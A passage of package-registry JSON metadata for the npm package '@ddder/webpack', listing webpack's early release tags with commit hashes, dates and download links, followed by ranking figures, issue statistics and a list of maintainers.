0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T17:39:28.803Z","dependent_packages_count":2,"downloads":12,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":54.90282062971637,"dependent_repos_count":10.295976646711454,"dependent_packages_count":8.833550931946979,"stargazers_count":0.07781277205059343,"forks_count":0.39273321703433056,"docker_downloads_count":null,"average":14.900578839491946},"purl":"pkg:npm/%40ddder/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@ddder/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@ddder/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@ddder/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T17:00:12.153Z","issues_count":10162,"pull_requests_count":9386,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2758812.4810541794,"issues_closed_count":9895,"pull_requests_closed_count":8841,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834382995473332,"avg_comments_per_pull_request":3.1543788621350948,"merged_pull_requests_count":5983,"bot_issues_count":8,"bot_pull_requests_count":2907,"past_year_issues_count":80,"past_year_pull_requests_count":896,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":359731.32045779686,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":699,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.3625,"past_year_avg_comments_per_pull_request":4.657366071428571,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":136,"past_year_merged_pull_requests_count":550,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1051,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":122,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/G